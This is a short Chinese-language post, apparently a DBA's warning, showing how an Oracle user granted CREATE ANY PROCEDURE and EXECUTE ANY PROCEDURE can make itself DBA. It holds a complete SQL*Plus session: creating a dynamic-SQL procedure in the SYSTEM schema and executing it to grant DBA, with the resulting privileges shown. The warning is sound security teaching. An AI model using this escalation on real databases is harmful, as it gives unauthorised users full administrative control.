给一般用户授 create any procedure、execture any procedure 这2个权限是很不安全的事。
因为授权后,通过一些处理,该用户可以取得dba权限,请一定注意。
下面是实验过程:
SQL> create user hacker identified by bbk;
User created.
SQL> grant create session to hacker;
Grant succeeded.
SQL> grant create any procedure,execute any procedure to hacker;
Grant succeeded.
SQL> conn hacker/bbk
Connected.
SQL> show user
USER is "HACKER"
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> create procedure system.h1(h1_str in varchar2) as
2 begin
3 execute immediate h1_str;
4 end;
5 /
Procedure created.
SQL> execute system.h1('grant dba to hacker');
PL/SQL procedure successfully completed.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
UNLIMITED TABLESPACE
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE
SQL> conn hacker/bbk
Connected.
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER
...................................
161 rows selected.
SQL> select * from session_roles;
ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
